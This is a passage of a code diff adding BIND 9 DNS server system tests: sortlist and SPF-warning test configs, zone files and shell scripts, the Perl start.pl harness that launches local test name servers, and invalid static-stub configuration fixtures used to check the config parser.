a/bin/tests/system/sortlist/ns1/named.conf.in b/bin/tests/system/sortlist/ns1/named.conf.in new file mode 100644 index 0000000..33081ff --- /dev/null +++ b/bin/tests/system/sortlist/ns1/named.conf.in @@ -0,0 +1,45 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +options { + query-source address 10.53.0.1; + notify-source 10.53.0.1; + transfer-source 10.53.0.1; + port @PORT@; + pid-file "named.pid"; + listen-on { 10.53.0.1; }; + listen-on-v6 { none; }; + recursion no; + notify yes; + + sortlist { + { 10.53.0.1; // IF 10.53.0.1 + { + !1.1.1.4; !1.1.1.2; !1.1.1.3; !1.1.1.1; // sort these last, + 192.168.3/24; // this first + { 192.168.2/24; 192.168.1/24; }; }; }; // and these next + { { 10.53.0.2; 10.53.0.3; }; }; // Prefer self + 10.53.0.4; // BIND 8 compat + { 10.53.0.5; 10.53.0.5; }; // BIND 8 compat + }; +}; + +zone "." { + type primary; + file "root.db"; +}; + +zone "example" { + type primary; + file "example.db"; +}; diff --git a/bin/tests/system/sortlist/ns1/root.db b/bin/tests/system/sortlist/ns1/root.db new file mode 100644 index 0000000..17780d1 --- /dev/null +++ b/bin/tests/system/sortlist/ns1/root.db @@ -0,0 +1,24 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +$TTL 300 +. IN SOA gson.nominum.com. a.root.servers.nil. ( + 2000042100 ; serial + 600 ; refresh + 600 ; retry + 1200 ; expire + 600 ; minimum + ) +. NS a.root-servers.nil. +a.root-servers.nil. A 10.53.0.1 + +example. NS ns2.example. +ns2.example. A 10.53.0.2 diff --git a/bin/tests/system/sortlist/setup.sh b/bin/tests/system/sortlist/setup.sh new file mode 100644 index 0000000..e46affa --- /dev/null +++ b/bin/tests/system/sortlist/setup.sh @@ -0,0 +1,17 @@ +#!/bin/sh + +# Copyright (C) Internet Systems Consortium, Inc. ("ISC") +# +# SPDX-License-Identifier: MPL-2.0 +# +# This Source Code Form is subject to the terms of the Mozilla Public +# License, v. 2.0. If a copy of the MPL was not distributed with this +# file, you can obtain one at https://mozilla.org/MPL/2.0/. +# +# See the COPYRIGHT file distributed with this work for additional +# information regarding copyright ownership. + +SYSTEMTESTTOP=.. +. $SYSTEMTESTTOP/conf.sh + +copy_setports ns1/named.conf.in ns1/named.conf diff --git a/bin/tests/system/sortlist/tests.sh b/bin/tests/system/sortlist/tests.sh new file mode 100644 index 0000000..b290a99 --- /dev/null +++ b/bin/tests/system/sortlist/tests.sh @@ -0,0 +1,51 @@ +#!/bin/sh + +# Copyright (C) Internet Systems Consortium, Inc. ("ISC") +# +# SPDX-License-Identifier: MPL-2.0 +# +# This Source Code Form is subject to the terms of the Mozilla Public +# License, v. 2.0. If a copy of the MPL was not distributed with this +# file, you can obtain one at https://mozilla.org/MPL/2.0/. +# +# See the COPYRIGHT file distributed with this work for additional +# information regarding copyright ownership. + +SYSTEMTESTTOP=.. +. $SYSTEMTESTTOP/conf.sh + +DIGOPTS="+tcp +noadd +nosea +nostat +noquest +noauth +nocomm +nocmd -p ${PORT}" + +status=0 + +echo_i "test 2-element sortlist statement" +cat <<EOF >test1.good +a.example. 300 IN A 192.168.3.1 +a.example. 300 IN A 192.168.1.1 +a.example. 300 IN A 1.1.1.5 +a.example. 300 IN A 1.1.1.1 +a.example. 300 IN A 1.1.1.3 +a.example. 300 IN A 1.1.1.2 +a.example. 300 IN A 1.1.1.4 +EOF +$DIG $DIGOPTS a.example. @10.53.0.1 -b 10.53.0.1 >test1.dig +# Note that this can't use digcomp.pl because here, the ordering of the +# result RRs is significant. +$DIFF test1.dig test1.good || status=1 + +echo_i "test 1-element sortlist statement and undocumented BIND 8 features" + cat <<EOF >test2.good +b.example. 300 IN A 10.53.0.$n +EOF + +$DIG $DIGOPTS b.example. @10.53.0.1 -b 10.53.0.2 | sed 1q | \ + grep -E '10.53.0.(2|3)$' > test2.out && +$DIG $DIGOPTS b.example. @10.53.0.1 -b 10.53.0.3 | sed 1q | \ + grep -E '10.53.0.(2|3)$' >> test2.out && +$DIG $DIGOPTS b.example. @10.53.0.1 -b 10.53.0.4 | sed 1q | \ + grep -E '10.53.0.4$' >> test2.out && +$DIG $DIGOPTS b.example. @10.53.0.1 -b 10.53.0.5 | sed 1q | \ + grep -E '10.53.0.5$' >> test2.out || status=1 + +echo_i "exit status: $status" +[ $status -eq 0 ] || exit 1 diff --git a/bin/tests/system/spf/clean.sh b/bin/tests/system/spf/clean.sh new file mode 100644 index 0000000..90dc7b6 --- /dev/null +++ b/bin/tests/system/spf/clean.sh @@ -0,0 +1,18 @@ +#!/bin/sh + +# Copyright (C) Internet Systems Consortium, Inc. ("ISC") +# +# SPDX-License-Identifier: MPL-2.0 +# +# This Source Code Form is subject to the terms of the Mozilla Public +# License, v. 2.0. If a copy of the MPL was not distributed with this +# file, you can obtain one at https://mozilla.org/MPL/2.0/. +# +# See the COPYRIGHT file distributed with this work for additional +# information regarding copyright ownership. + +rm -f ns1/named.run +rm -f ns1/named.memstats +rm -f ns*/named.lock +rm -f ns*/named.conf +rm -f ns*/managed-keys.bind* diff --git a/bin/tests/system/spf/ns1/named.conf.in b/bin/tests/system/spf/ns1/named.conf.in new file mode 100644 index 0000000..f828586 --- /dev/null +++ b/bin/tests/system/spf/ns1/named.conf.in @@ -0,0 +1,42 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +options { + query-source address 10.53.0.1; + notify-source 10.53.0.1; + transfer-source 10.53.0.1; + port @PORT@; + pid-file "named.pid"; + listen-on { 10.53.0.1; }; + listen-on-v6 { none; }; + recursion no; + notify yes; + ixfr-from-differences yes; +}; + +zone "spf" { + type primary; + file "spf.db"; +}; + +zone "warn" { + type primary; + file "spf.db"; + check-spf warn; +}; + +zone "nowarn" { + type primary; + file "spf.db"; + check-spf ignore; +}; diff --git a/bin/tests/system/spf/ns1/spf.db b/bin/tests/system/spf/ns1/spf.db new file mode 100644 index 0000000..9527b1b --- /dev/null +++ b/bin/tests/system/spf/ns1/spf.db @@ -0,0 +1,18 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +@ 0 IN SOA . . 0 0 0 0 0 +@ 0 IN NS . +@ 0 IN TXT "v=spf1 -all" +@ 0 IN SPF "v=spf1 -all" +x 0 IN TXT "v=spf1" +y 0 IN SPF "v=spf1" +y 0 IN TXT "a non spf record" diff --git a/bin/tests/system/spf/setup.sh b/bin/tests/system/spf/setup.sh new file mode 100644 index 0000000..e46affa --- /dev/null +++ b/bin/tests/system/spf/setup.sh @@ -0,0 +1,17 @@ +#!/bin/sh + +# Copyright (C) Internet Systems Consortium, Inc. ("ISC") +# +# SPDX-License-Identifier: MPL-2.0 +# +# This Source Code Form is subject to the terms of the Mozilla Public +# License, v. 2.0. If a copy of the MPL was not distributed with this +# file, you can obtain one at https://mozilla.org/MPL/2.0/. +# +# See the COPYRIGHT file distributed with this work for additional +# information regarding copyright ownership. + +SYSTEMTESTTOP=.. +. $SYSTEMTESTTOP/conf.sh + +copy_setports ns1/named.conf.in ns1/named.conf diff --git a/bin/tests/system/spf/tests.sh b/bin/tests/system/spf/tests.sh new file mode 100644 index 0000000..b7e86f0 --- /dev/null +++ b/bin/tests/system/spf/tests.sh @@ -0,0 +1,46 @@ +#!/bin/sh + +# Copyright (C) Internet Systems Consortium, Inc. ("ISC") +# +# SPDX-License-Identifier: MPL-2.0 +# +# This Source Code Form is subject to the terms of the Mozilla Public +# License, v. 2.0. If a copy of the MPL was not distributed with this +# file, you can obtain one at https://mozilla.org/MPL/2.0/. +# +# See the COPYRIGHT file distributed with this work for additional +# information regarding copyright ownership. + +SYSTEMTESTTOP=.. +. $SYSTEMTESTTOP/conf.sh + +n=1 +status=0 + +# Wait until all zones are loaded before checking SPF related logs +for i in 1 2 3 4 5 6 7 8 9 10 +do + grep "all zones loaded" ns1/named.run > /dev/null && break + sleep 1 +done + +echo_i "checking that SPF warnings have been correctly generated ($n)" +ret=0 + +grep "zone spf/IN: loaded serial 0" ns1/named.run > /dev/null || ret=1 +grep "'y.spf' found type SPF" ns1/named.run > /dev/null || ret=1 +grep "'spf' found type SPF" ns1/named.run > /dev/null && ret=1 + +grep "zone warn/IN: loaded serial 0" ns1/named.run > /dev/null || ret=1 +grep "'y.warn' found type SPF" ns1/named.run > /dev/null || ret=1 +grep "'warn' found type SPF" ns1/named.run > /dev/null && ret=1 + +grep "zone nowarn/IN: loaded serial 0" ns1/named.run > /dev/null || ret=1 +grep "'y.nowarn' found type SPF" ns1/named.run > /dev/null && ret=1 +grep "'nowarn' found type SPF" ns1/named.run > /dev/null && ret=1 +n=`expr $n + 1` +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +echo_i "exit status: $status" +[ $status -eq 0 ] || exit 1 diff --git a/bin/tests/system/start.pl b/bin/tests/system/start.pl new file mode 100755 index 0000000..80d25ee --- /dev/null +++ b/bin/tests/system/start.pl @@ -0,0 +1,451 @@ +#!/usr/bin/perl -w + +# Copyright (C) Internet Systems Consortium, Inc. ("ISC") +# +# SPDX-License-Identifier: MPL-2.0 +# +# This Source Code Form is subject to the terms of the Mozilla Public +# License, v. 2.0. If a copy of the MPL was not distributed with this +# file, you can obtain one at https://mozilla.org/MPL/2.0/. +# +# See the COPYRIGHT file distributed with this work for additional +# information regarding copyright ownership. + +# Framework for starting test servers. +# Based on the type of server specified, check for port availability, remove +# temporary files, start the server, and verify that the server is running. +# If a server is specified, start it. Otherwise, start all servers for test. + +use strict; +use warnings; + +use Cwd ':DEFAULT', 'abs_path'; +use English '-no_match_vars'; +use Getopt::Long; +use Time::HiRes 'sleep'; # allows sleeping fractional seconds + +# Usage: +# perl start.pl [--noclean] [--restart] [--port port] [--taskset cpus] test [server [options]] +# +# --noclean Do not cleanup files in server directory. +# +# --restart Indicate that the server is being restarted, so get the +# server to append output to an existing log file instead of +# starting a new one. +# +# --port port Specify the default port being used by the server to answer +# queries (default 5300). This script will interrogate the +# server on this port to see if it is running. (Note: for +# "named" nameservers, this can be overridden by the presence +# of the file "named.port" in the server directory containing +# the number of the query port.) +# +# --taskset cpus Use taskset to signal which cpus can be used. For example +# cpus=fff0 means all cpus aexcept for 0, 1, 2, and 3 are +# eligible. +# +# test Name of the test directory. +# +# server Name of the server directory. This will be of the form +# "nsN" or "ansN", where "N" is an integer between 1 and 8. +# If not given, the script will start all the servers in the +# test directory. +# +# options Alternate options for the server. +# +# NOTE: options must be specified with '-- "<option list>"', +# for instance: start.pl . ns1 -- "-c n.conf -d 43" +# +# ALSO NOTE: this variable will be filled with the contents +# of the first non-commented/non-blank line of args in a file +# called "named.args" in an ns*/ subdirectory. Only the FIRST +# non-commented/non-blank line is used (everything else in +# the file is ignored). If "options" is already set, then +# "named.args" is ignored. + +my $usage = "usage: $0 [--noclean] [--restart] [--port <port>] [--taskset <cpus>] test-directory [server-directory [server-options]]"; +my $clean = 1; +my $restart = 0; +my $queryport = 5300; +my $taskset = ""; + +GetOptions( + 'clean!' => \$clean, + 'restart!' => \$restart, + 'port=i' => \$queryport, + 'taskset=s' => \$taskset, +) or die "$usage\n"; + +my( $test, $server_arg, $options_arg ) = @ARGV; + +if (!$test) { + die "$usage\n"; +} + +# Global variables +my $topdir = abs_path($ENV{'SYSTEMTESTTOP'}); +my $testdir = abs_path($topdir . "/" . $test); + +if (! -d $testdir) { + die "No test directory: \"$testdir\"\n"; +} + +if ($server_arg && ! -d "$testdir/$server_arg") { + die "No server directory: \"$testdir/$server_arg\"\n"; +} + +my $NAMED = $ENV{'NAMED'}; +my $DIG = $ENV{'DIG'}; +my $PERL = $ENV{'PERL'}; +my $PYTHON = $ENV{'PYTHON'}; + +# Start the server(s) + +my @ns; +my @ans; + +if ($server_arg) { + if ($server_arg =~ /^ns/) { + push(@ns, $server_arg); + } elsif ($server_arg =~ /^ans/) { + push(@ans, $server_arg); + } else { + print "$0: ns or ans directory expected"; + print "I:$test:failed"; + } +} else { + # Determine which servers need to be started for this test. + opendir DIR, $testdir or die "unable to read test directory: \"$test\" ($OS_ERROR)\n"; + my @files = sort readdir DIR; + closedir DIR; + + @ns = grep /^ns[0-9]*$/, @files; + @ans = grep /^ans[0-9]*$/, @files; +} + +# Start the servers we found. + +foreach my $name(@ns) { + my $instances_so_far = count_running_lines($name); + &check_ns_port($name); + &start_ns_server($name, $options_arg); + &verify_ns_server($name, $instances_so_far); +} + +foreach my $name(@ans) { + &start_ans_server($name); +} + +# Subroutines + +sub read_ns_port { + my ( $server ) = @_; + my $port = $queryport; + my $options = ""; + + if ($server) { + my $file = $testdir . "/" . $server . "/named.port"; + + if (-e $file) { + open(my $fh, "<", $file) or die "unable to read ports file \"$file\" ($OS_ERROR)"; + + my $line = <$fh>; + + if ($line) { + chomp $line; + $port = $line; + } + } + } + return ($port); +} + +sub check_ns_port { + my ( $server ) = @_; + my $options = ""; + my $port = read_ns_port($server); + + if ($server =~ /(\d+)$/) { + $options = "-i $1"; + } + + my $tries = 0; + + while (1) { + my $return = system("$PERL $topdir/testsock.pl -p $port $options"); + + if ($return == 0) { + last; + } + + $tries++; + + if ($tries > 4) { + print "$0: could not bind to server addresses, still running?\n"; + print "I:$test:server sockets not available\n"; + print "I:$test:failed\n"; + + system("$PERL $topdir/stop.pl $test"); # Is this the correct behavior? + + exit 1; + } + + print "I:$test:Couldn't bind to socket (yet)\n"; + sleep 2; + } +} + +sub start_server { + my ( $server, $command, $pid_file ) = @_; + + chdir "$testdir/$server" or die "unable to chdir \"$testdir/$server\" ($OS_ERROR)\n"; + + # start the server + my $child = `$command`; + chomp($child); + + # wait up to 14 seconds for the server to start and to write the + # pid file otherwise kill this server and any others that have + # already been started + my $tries = 0; + while (!-s $pid_file) { + if (++$tries > 140) { + print "I:$test:Couldn't start server $command (pid=$child)\n"; + print "I:$test:failed\n"; + kill "ABRT", $child if ("$child" ne ""); + chdir "$testdir"; + system "$PERL $topdir/stop.pl $test"; + exit 1; + } + sleep 0.1; + } + + # go back to the top level directory + chdir $topdir; +} + +sub construct_ns_command { + my ( $server, $options ) = @_; + + my $command; + + if ($ENV{'USE_VALGRIND'}) { + $command = "valgrind -q --gen-suppressions=all --num-callers=48 --fullpath-after= --log-file=named-$server-valgrind-%p.log "; + + if ($ENV{'USE_VALGRIND'} eq 'helgrind') { + $command .= "--tool=helgrind "; + } else { + $command .= "--tool=memcheck --track-origins=yes --leak-check=full "; + } + + $command .= "$NAMED -m none -M external "; + } else { + if ($taskset) { + $command = "taskset $taskset $NAMED "; + } else { + $command = "$NAMED "; + } + } + + my $args_file = $testdir . "/" . $server . "/" . "named.args"; + + if ($options) { + $command .= $options; + } elsif (-e $args_file) { + open(my $fh, "<", $args_file) or die "unable to read args_file \"$args_file\" ($OS_ERROR)\n"; + + while(my $line=<$fh>) { + next if ($line =~ /^\s*$/); #discard blank lines + next if ($line =~ /^\s*#/); #discard comment lines + + chomp $line; + + $line =~ s/#.*$//; + + $command .= $line; + + last; + } + } else { + $command .= "-D $test-$server "; + $command .= "-X named.lock "; + $command .= "-m record,size,mctx "; + + foreach my $t_option( + "dropedns", "ednsformerr", "ednsnotimp", "ednsrefused", + "noaa", "noedns", "nosoa", "maxudp512", "maxudp1460", + ) { + if (-e "$testdir/$server/named.$t_option") { + $command .= "-T $t_option " + } + } + + $command .= "-c named.conf -d 99 -g -U 4 -T maxcachesize=2097152"; + } + + if (-e "$testdir/$server/named.notcp") { + $command .= " -T notcp" + } + + if ($restart) { + $command .= " >>named.run 2>&1 &"; + } else { + $command .= " >named.run 2>&1 &"; + } + + # get the shell to report the pid of the server ($!) + $command .= " echo \$!"; + + return $command; +} + +sub start_ns_server { + my ( $server, $options ) = @_; + + my $cleanup_files; + my $command; + my $pid_file; + + $cleanup_files = "{./*.jnl,./*.bk,./*.st,./named.run}"; + + $command = construct_ns_command($server, $options); + + $pid_file = "named.pid"; + + if ($clean) { + unlink glob $cleanup_files; + } + + start_server($server, $command, $pid_file); +} + +sub construct_ans_command { + my ( $server, $options ) = @_; + + my $command; + my $n; + + if ($server =~ /^ans(\d+)/) { + $n = $1; + } else { + die "unable to parse server number from name \"$server\"\n"; + } + + if (-e "$testdir/$server/ans.py") { + $command = "$PYTHON -u ans.py 10.53.0.$n $queryport"; + } elsif (-e "$testdir/$server/ans.pl") { + $command = "$PERL ans.pl"; + } else { + $command = "$PERL $topdir/ans.pl 10.53.0.$n"; + } + + if ($options) { + $command .= $options; + } + + if ($restart) { + $command .= " >>ans.run 2>&1 &"; + } else { + $command .= " >ans.run 2>&1 &"; + } + + # get the shell to report the pid of the server ($!) + $command .= " echo \$!"; + + return $command; +} + +sub start_ans_server { + my ( $server, $options ) = @_; + + my $cleanup_files; + my $command; + my $pid_file; + + $cleanup_files = "{./ans.run}"; + $command = construct_ans_command($server, $options); + $pid_file = "ans.pid"; + + if ($clean) { + unlink glob $cleanup_files; + } + + start_server($server, $command, $pid_file); +} + +sub count_running_lines { + my ( $server ) = @_; + + my $runfile = "$testdir/$server/named.run"; + + # the shell *ought* to have created the file immediately, but this + # logic allows the creation to be delayed without issues + if (open(my $fh, "<", $runfile)) { + # the two non-whitespace blobs should be the date and time + # but we don't care about them really, only that they are there + return scalar(grep /^\S+ \S+ running\R/, <$fh>); + } else { + return 0; + } +} + +sub verify_ns_server { + my ( $server, $instances_so_far ) = @_; + + my $tries = 0; + + while (count_running_lines($server) < $instances_so_far + 1) { + $tries++; + + if ($tries >= 30) { + print "I:$test:server $server seems to have not started\n"; + print "I:$test:failed\n"; + + system("$PERL $topdir/stop.pl $test"); + + exit 1; + } + + sleep 2; + } + + $tries = 0; + + my $port = read_ns_port($server); + my $tcp = "+tcp"; + my $n; + + if ($server =~ /^ns(\d+)/) { + $n = $1; + } else { + die "unable to parse server number from name \"$server\"\n"; + } + + if (-e "$testdir/$server/named.notcp") { + $tcp = ""; + } + + my $ip = "10.53.0.$n"; + if (-e "$testdir/$server/named.ipv6-only") { + $ip = "fd92:7065:b8e:ffff::$n"; + } + + while (1) { + my $return = system("$DIG $tcp +noadd +nosea +nostat +noquest +nocomm +nocmd +noedns -p $port version.bind. chaos txt \@$ip > /dev/null"); + + last if ($return == 0); + + $tries++; + + if ($tries >= 30) { + print "I:$test:no response from $server\n"; + print "I:$test:failed\n"; + + system("$PERL $topdir/stop.pl $test"); + + exit 1; + } + + sleep 2; + } +} diff --git a/bin/tests/system/start.sh b/bin/tests/system/start.sh new file mode 100755 index 0000000..06261cf --- /dev/null +++ b/bin/tests/system/start.sh @@ -0,0 +1,19 @@ +#!/bin/sh + +# Copyright (C) Internet Systems Consortium, Inc. ("ISC") +# +# SPDX-License-Identifier: MPL-2.0 +# +# This Source Code Form is subject to the terms of the Mozilla Public +# License, v. 2.0. If a copy of the MPL was not distributed with this +# file, you can obtain one at https://mozilla.org/MPL/2.0/. +# +# See the COPYRIGHT file distributed with this work for additional +# information regarding copyright ownership. + +SYSTEMTESTTOP="$(cd -P -- "$(dirname -- "$0")" && pwd -P)" +# shellcheck source=conf.sh +. "$SYSTEMTESTTOP/conf.sh" +export SYSTEMTESTTOP + +$PERL "$SYSTEMTESTTOP/start.pl" "$@" diff --git a/bin/tests/system/staticstub/clean.sh b/bin/tests/system/staticstub/clean.sh new file mode 100755 index 0000000..f0dbe28 --- /dev/null +++ b/bin/tests/system/staticstub/clean.sh @@ -0,0 +1,28 @@ +#!/bin/sh + +# Copyright (C) Internet Systems Consortium, Inc. ("ISC") +# +# SPDX-License-Identifier: MPL-2.0 +# +# This Source Code Form is subject to the terms of the Mozilla Public +# License, v. 2.0. If a copy of the MPL was not distributed with this +# file, you can obtain one at https://mozilla.org/MPL/2.0/. +# +# See the COPYRIGHT file distributed with this work for additional +# information regarding copyright ownership. + +rm -f tmp +rm -f dig.out.* +rm -f ns*/named.lock +rm -f ns*/named.conf +rm -f ns3/example.db +rm -f ns3/undelegated.db +rm -f ns4/sub.example.db +rm -f ns?/named.memstats +rm -f ns?/named.run +rm -f ns?/named_dump.db +rm -rf */*.signed +rm -rf */K* +rm -rf */dsset-* +rm -rf */trusted.conf +rm -f ns*/managed-keys.bind* diff --git a/bin/tests/system/staticstub/conf/bad01.conf b/bin/tests/system/staticstub/conf/bad01.conf new file mode 100644 index 0000000..a849de4 --- /dev/null +++ b/bin/tests/system/staticstub/conf/bad01.conf @@ -0,0 +1,32 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +# Copyright (C) 2010 Internet Systems Consortium, Inc. ("ISC") +# +# Permission to use, copy, modify, and/or distribute this software for any +# purpose with or without fee is hereby granted, provided that the above +# copyright notice and this permission notice appear in all copies. +# +# THE SOFTWARE IS PROVIDED "AS IS" AND ISC DISCLAIMS ALL WARRANTIES WITH +# REGARD TO THIS SOFTWARE INCLUDING ALL IMPLIED WARRANTIES OF MERCHANTABILITY +# AND FITNESS. IN NO EVENT SHALL ISC BE LIABLE FOR ANY SPECIAL, DIRECT, +# INDIRECT, OR CONSEQUENTIAL DAMAGES OR ANY DAMAGES WHATSOEVER RESULTING FROM +# LOSS OF USE, DATA OR PROFITS, WHETHER IN AN ACTION OF CONTRACT, NEGLIGENCE +# OR OTHER TORTIOUS ACTION, ARISING OUT OF OR IN CONNECTION WITH THE USE OR +# PERFORMANCE OF THIS SOFTWARE. + +# prefix cannot be specified in the address list field. +zone "example.com" { + type static-stub; + server-addresses { 192.0.2.0/24; }; +}; diff --git a/bin/tests/system/staticstub/conf/bad02.conf b/bin/tests/system/staticstub/conf/bad02.conf new file mode 100644 index 0000000..9c85d00 --- /dev/null +++ b/bin/tests/system/staticstub/conf/bad02.conf @@ -0,0 +1,32 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +# Copyright (C) 2010 Internet Systems Consortium, Inc. ("ISC") +# +# Permission to use, copy, modify, and/or distribute this software for any +# purpose with or without fee is hereby granted, provided that the above +# copyright notice and this permission notice appear in all copies. +# +# THE SOFTWARE IS PROVIDED "AS IS" AND ISC DISCLAIMS ALL WARRANTIES WITH +# REGARD TO THIS SOFTWARE INCLUDING ALL IMPLIED WARRANTIES OF MERCHANTABILITY +# AND FITNESS. IN NO EVENT SHALL ISC BE LIABLE FOR ANY SPECIAL, DIRECT, +# INDIRECT, OR CONSEQUENTIAL DAMAGES OR ANY DAMAGES WHATSOEVER RESULTING FROM +# LOSS OF USE, DATA OR PROFITS, WHETHER IN AN ACTION OF CONTRACT, NEGLIGENCE +# OR OTHER TORTIOUS ACTION, ARISING OUT OF OR IN CONNECTION WITH THE USE OR +# PERFORMANCE OF THIS SOFTWARE. + +# server-names must be valid domain names. +zone "example.com" { + type static-stub; + server-names { "\11.example.net"; }; +}; diff --git a/bin/tests/system/staticstub/conf/bad03.conf b/bin/tests/system/staticstub/conf/bad03.conf new file mode 100644 index 0000000..b5aa0f4 --- /dev/null +++ b/bin/tests/system/staticstub/conf/bad03.conf @@ -0,0 +1,32 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +# Copyright (C) 2010 Internet Systems Consortium, Inc. ("ISC") +# +# Permission to use, copy, modify, and/or distribute this software for any +# purpose with or without fee is hereby granted, provided that the above +# copyright notice and this permission notice appear in all copies. +# +# THE SOFTWARE IS PROVIDED "AS IS" AND ISC DISCLAIMS ALL WARRANTIES WITH +# REGARD TO THIS SOFTWARE INCLUDING ALL IMPLIED WARRANTIES OF MERCHANTABILITY +# AND FITNESS. IN NO EVENT SHALL ISC BE LIABLE FOR ANY SPECIAL, DIRECT, +# INDIRECT, OR CONSEQUENTIAL DAMAGES OR ANY DAMAGES WHATSOEVER RESULTING FROM +# LOSS OF USE, DATA OR PROFITS, WHETHER IN AN ACTION OF CONTRACT, NEGLIGENCE +# OR OTHER TORTIOUS ACTION, ARISING OUT OF OR IN CONNECTION WITH THE USE OR +# PERFORMANCE OF THIS SOFTWARE. + +# Explicit port specification is not allowed (for now). +zone "example.com" { + type static-stub; + server-addresses { 192.0.2.2 port 5301; }; +}; diff --git a/bin/tests/system/staticstub/conf/bad04.conf b/bin/tests/system/staticstub/conf/bad04.conf new file mode 100644 index 0000000..ec25b7a --- /dev/null +++ b/bin/tests/system/staticstub/conf/bad04.conf @@ -0,0 +1,32 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +# Copyright (C) 2010 Internet Systems Consortium, Inc. ("ISC") +# +# Permission to use, copy, modify, and/or distribute this software for any +# purpose with or without fee is hereby granted, provided that the above +# copyright notice and this permission notice appear in all copies. +# +# THE SOFTWARE IS PROVIDED "AS IS" AND ISC DISCLAIMS ALL WARRANTIES WITH +# REGARD TO THIS SOFTWARE INCLUDING ALL IMPLIED WARRANTIES OF MERCHANTABILITY +# AND FITNESS. IN NO EVENT SHALL ISC BE LIABLE FOR ANY SPECIAL, DIRECT, +# INDIRECT, OR CONSEQUENTIAL DAMAGES OR ANY DAMAGES WHATSOEVER RESULTING FROM +# LOSS OF USE, DATA OR PROFITS, WHETHER IN AN ACTION OF CONTRACT, NEGLIGENCE +# OR OTHER TORTIOUS ACTION, ARISING OUT OF OR IN CONNECTION WITH THE USE OR +# PERFORMANCE OF THIS SOFTWARE. + +# scoped address is not allowed. +zone "example.com" { + type static-stub; + server-addresses { fe80::1%1; }; +}; diff --git a/bin/tests/system/staticstub/conf/bad05.conf b/bin/tests/system/staticstub/conf/bad05.conf new file mode 100644 index 0000000..e47f412 --- /dev/null +++ b/bin/tests/system/staticstub/conf/bad05.conf @@ -0,0 +1,33 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +# Copyright (C) 2010 Internet Systems Consortium, Inc. ("ISC") +# +# Permission to use, copy, modify, and/or distribute this software for any +# purpose with or without fee is hereby granted, provided that the above +# copyright notice and this permission notice appear in all copies. +# +# THE SOFTWARE IS PROVIDED "AS IS" AND ISC DISCLAIMS ALL WARRANTIES WITH +# REGARD TO THIS SOFTWARE INCLUDING ALL IMPLIED WARRANTIES OF MERCHANTABILITY +# AND FITNESS. IN NO EVENT SHALL ISC BE LIABLE FOR ANY SPECIAL, DIRECT, +# INDIRECT, OR CONSEQUENTIAL DAMAGES OR ANY DAMAGES WHATSOEVER RESULTING FROM +# LOSS OF USE, DATA OR PROFITS, WHETHER IN AN ACTION OF CONTRACT, NEGLIGENCE +# OR OTHER TORTIOUS ACTION, ARISING OUT OF OR IN CONNECTION WITH THE USE OR +# PERFORMANCE OF THIS SOFTWARE. + +# server-name must not be a subdomain of the zone name. +zone "example.com" { + type static-stub; + # server-name equals to the zone name. + server-names { "example.com"; }; +}; diff --git a/bin/tests/system/staticstub/conf/bad06.conf b/bin/tests/system/staticstub/conf/bad06.conf new file mode 100644 index 0000000..be75748 --- /dev/null +++ b/bin/tests/system/staticstub/conf/bad06.conf @@ -0,0 +1,33 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file 